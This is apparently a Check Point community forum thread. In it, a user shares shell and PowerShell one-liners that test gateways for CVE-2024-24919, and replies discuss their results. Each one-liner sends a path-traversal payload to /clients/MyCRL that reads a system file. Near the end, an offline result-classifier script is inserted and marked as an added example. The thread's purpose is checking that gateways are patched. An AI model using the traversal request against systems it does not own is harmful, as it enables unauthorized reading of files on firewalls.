HeikoAnkenbrand
Champion

ONELINER - Check CVE-2024-24919 Vulnerability

Run this oneliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1)  Depending on where you want to run the oneliner, you can copy and paste the code for GAIA, Linux or PowerShell.
     Copy the code into the CLI.

1a) GAIA version for expert mode:

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1b) Linux version (all other linux distributions):

 

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

 

1c) Windows PowerShell version:

 

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} };  if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point")  {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

 

2) Now enter the IP address of the gateway to be checked.


If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not reachable.

---

Version:
1.5   06/02/2024   PowerShell interactive version with windows
1.4   06/01/2024   PowerShell version with correct status codes
1.3   06/01/2024   Linux and PowerShell version provided
1.2   05/30/2024   error with SMB applications fixed
1.1   05/29/2024   fixed error with output
1.0   05/28/2024   first version

➜ CCSM Elite, CCME, CCTE
(4)
19 Replies
natascha
Explorer

Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.

Thanks @HeikoAnkenbrand 

renzi
Participant

Nice

0 Kudos
the_rock
Legend

Fantastic as always!

0 Kudos
dceko
Explorer

Hi,

Can you modify the script to check only for the HTTP response code after "| sed", because I think every gateway that responds with a response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by a management server.

0 Kudos
HeikoAnkenbrand
Champion

I have adapted the code so that it should now also work with SMB applications.

➜ CCSM Elite, CCME, CCTE
0 Kudos
the_rock
Legend

I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so it's possible this is not even related to the original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.

Andy

CVE-2024-24919 check tool by Heiko Ankenbrand 2024


Destination IP: 52.229.98.249
[Expert@azurefw:0]#

0 Kudos
Moudar
Advisor

When running it on my gateway in expert mode I get this:

Destination IP: 10.10.11.11
<!DOCTYPE html><HTML><HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE"  /><TITLE>GAiA</TITLE>
<link rel="shortcut icon" href="/login/fav.ico">
<link rel="stylesheet" type="text/css" href="/login/ext-all.css" />
<link rel="stylesheet" type="text/css" href="/login/login.css" />
<STYLE TYPE="text/css">
.ext-ie .webui-login-fld{font-size: 11px;}
</STYLE>
<script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>

  

the_rock
Legend

R81.20?

0 Kudos
HeikoAnkenbrand
Champion

Hi @Moudar 

This is the HTML code of the gateway login screen.
I have modified the oneliner so that this will no longer be shown in the future.

➜ CCSM Elite, CCME, CCTE
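
The verdict logic of the one-liners, covering the 404, login-page and no-response cases raised in the replies above, as an added example (not part of the original post and not Check Point tooling). It classifies an already captured HTTP status and body offline and sends no traffic; the `label|status|body` record format, the function names and the `gw-*` labels are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: offline interpretation of probe results. Nothing is sent
# over the network; input is a status code and body captured beforehand.

# classify_probe STATUS BODY
#   STATUS: HTTP status code as a string. "000" is what curl's
#           -w '%{http_code}' reports when no HTTP response arrived.
#   BODY:   response body (may be empty or multi-line).
# Prints one of: unreachable | vulnerable | not-detected
classify_probe() {
    cp_status=$1
    cp_body=$2
    case $cp_status in
        ''|000) echo unreachable; return 0 ;;
    esac
    # Same prefix test as the awk index(...) == 1 check in the post,
    # combined with the status-200 condition of the PowerShell version.
    case $cp_status:$cp_body in
        "200:Check Point"*) echo vulnerable ;;
        # 404, or 200 with unrelated content such as the Gaia login page.
        *) echo not-detected ;;
    esac
}

# summarize_results: reads "label|status|first body line" records on stdin
# (record format is an assumption) and prints "label verdict" per record.
summarize_results() {
    while IFS='|' read -r label status body; do
        [ -z "$label" ] && continue
        printf '%s %s\n' "$label" "$(classify_probe "$status" "$body")"
    done
}

# Constructed sample records (placeholder labels, not real gateways).
sample_results() {
    printf '%s\n' \
        'gw-a|200|Check Point Gaia R81.20' \
        'gw-b|404|' \
        'gw-c|200|<!DOCTYPE html><HTML><HEAD>' \
        'gw-d|000|'
}

sample_results | summarize_results
```

Keeping "unreachable" separate from "not-detected" avoids reading an empty result as a clean one.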
genisis__
Leader

Is there a oneliner we can run on the gateway itself and how does this work in VSX?

0 Kudos
HeikoAnkenbrand
Champion

I think that should work in VS0.

➜ CCSM Elite, CCME, CCTE
0 Kudos
genisis__
Leader

thanks Heiko

0 Kudos
HeikoAnkenbrand
Champion

Version 1.5 works as an interactive version with windows:

➜ CCSM Elite, CCME, CCTE
the_rock
Legend

AWESOME!

0 Kudos
EitschStwoN
Explorer

Hi Heiko,

Thanks for this script, it is really a shame that Check Point did not provide this themselves or at least refer to this article in the mitigation guide.

Looks like the problem has been around for a long time and it's strange that this has never been seen in a CODE review.
Usually you trust a firewall not to have such rookie bugs.


Markus

GHOST
Participant

👍

0 Kudos
HeikoAnkenbrand
Champion

@EitschStwoN 

I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.

➜ CCSM Elite, CCME, CCTE
the_rock
Legend

Totally agree.

0 Kudos
